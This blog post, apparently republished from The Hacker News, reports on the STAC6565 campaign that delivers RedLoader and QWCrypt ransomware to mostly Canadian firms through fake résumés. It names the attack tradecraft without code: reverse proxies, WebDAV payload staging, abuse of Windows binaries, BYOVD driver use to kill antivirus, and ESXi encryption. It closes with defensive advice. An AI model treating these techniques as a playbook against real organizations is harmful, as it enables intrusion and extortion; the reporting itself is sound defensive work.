top of page
Buscar

The Candidate Who Should Have Never Been Hired: STAC6565 Infiltrates Through Fake Job Applications

  • Foto del escritor: Javier Conejo del Cerro
    Javier Conejo del Cerro
  • hace 2 días
  • 3 Min. de lectura
ree

A resume arrives in the inbox of an HR manager in Vancouver. Polished design. Impressive experience. No red flags. A promising candidate worth interviewing.

Except—behind that document hides a professional cybercriminal operation.

STAC6565, with strong overlaps to the financial threat group Gold Blade (also known as RedCurl and Earth Kapre), has turned the job recruitment process into a covert infiltration channel. Using weaponized résumés uploaded to trusted job platforms like Indeed, JazzHR, and ADP WorkforceNow, they smuggle QWCrypt ransomware into corporate systems, especially in Canada, where nearly 80% of known attacks are focused.

The attackers pretend to be applicants seeking an opportunity. But what they truly want is to steal corporate data first and encrypt everything later.

The candidate gets the job.

The company gets compromised.


Phase 1: Profiling the Target — Canada Under Surveillance


Since late 2018, this threat cluster has steadily expanded from initial operations in Russia to multiple regions. Yet the current campaign is different: the overwhelming majority of intrusions strike Canada.

This precise geographic focus suggests:

  • A client-driven hack-for-hire model

  • Targeting sectors where stolen business intelligence has high black-market value (services, NGOs, retail, manufacturing, transportation, technology)

STAC6565 is patient. Between February 2024 and August 2025, Sophos investigated nearly 40 intrusions—usually separated by dormant periods that allow the threat actor to refresh and refine their tradecraft before the next attack wave begins.

Their reputation is no longer espionage-only. They blend stealthy data theft with high-impact ransomware extortion.


Phase 2: The Job Application — Weaponized Résumés Go Through HR


The operation begins by impersonating job applicants.

The email looks legitimate. The résumé comes from real job platforms, not unknown domains.

Recruitment workflows make the perfect smuggling path:

  • HR staff must open résumés

  • Attachments look normal

  • Job platforms bypass traditional spam filters

  • Disposable emails enhance evasion

  • The psychological pressure to answer candidates quickly increases human error

Cybercriminals don’t need to trick the user.

The platform does it for them.


Phase 3: The Initial Dropper — Clicking Isn’t Necessary


Once opened, the fake CV performs a silent redirect to a booby-trapped URL.

This triggers the RedLoader chain, which progressively escalates access:

  1. Collect host info

  2. Query Active Directory structures

  3. Inventory installed software and defenses

  4. Establish covert communications through reverse proxies (RPivot, Chisel SOCKS5)

  5. Download next-stage payloads from attacker-controlled WebDAV infrastructure

Each intrusion is tailored.

Each resume is a unique trojan cargo.


Phase 4: Borrowing Windows Tools — A Fileless Killing Chain


RedLoader abuses legitimate executables such as:

  • rundll32.exe for DLL sideloading

  • program compatibility assistant (pcalua.exe) for stealth execution

  • ADNotificationManager.exe renamed for confusion

  • Cloudflare Workers hosting infrastructure

When needed, the attackers take down defenses first.

They use Bring Your Own Vulnerable Driver (BYOVD) tactics:

  • A signed Zemana AntiMalware driver is weaponized

  • Antivirus and EDR processes are terminated

  • The rest of the operation proceeds undetected

Everything feels routine to the system.

Everything is rotten underneath.


Phase 5: The Final Stage — QWCrypt Ransomware Deployment


Only once the value of the stolen data is clear, the operation escalates.

QWCrypt:

  • Is customized per organization

  • Contains victim-specific identifiers

  • Targets hypervisors directly (ESXi)

  • Disables recovery mechanisms

  • Deletes PowerShell history and shadows

  • Encrypts virtual machine volumes and endpoints in parallel

Some attacks even show a five-day pause between data exfiltration and encryption attempts — a sign of monetization negotiation, or waiting for the right moment to maximize damage.

The job interview was a trap.

The locker was always the goal.


Victims: The People Who Only Wanted to Hire


Employees in HR and recruiting teams are high-value targets, yet rarely considered frontline defenders.

They are:

  • Granted access to internal systems

  • Trusted to receive external files daily

  • Overloaded with volume and deadlines

This campaign proves that the weakest link isn’t ignorance —

it’s a workflow that attackers can manipulate.

STAC6565 weaponizes business productivity against the business itself.


STAC6565 has redefined ransomware intrusion by merging:

  • Corporate espionage (steal first)

  • Operational extortion (encrypt later)

  • Job portal infiltration (instant access)

  • Infrastructure targeting (hypervisors + AD)

  • Tradecraft upgrades after every spike

No zero-day exploits.

No fake brands.

No malware emails dumped into spam.

Just a résumé that looks perfect.


Defensive Imperatives


Organizations must:

  • Lock down HR workflows to block risky file types and unknown shortcuts

  • Apply MFA and network segmentation to hypervisor and AD management planes

  • Detect suspicious WebDAV and PowerShell execution patterns

  • Assume that recruitment activity is a critical attack vector

Because when the candidate looks too good to be true…

They might be the one preparing to fire everyone.



The Hacker News


 
 
 
bottom of page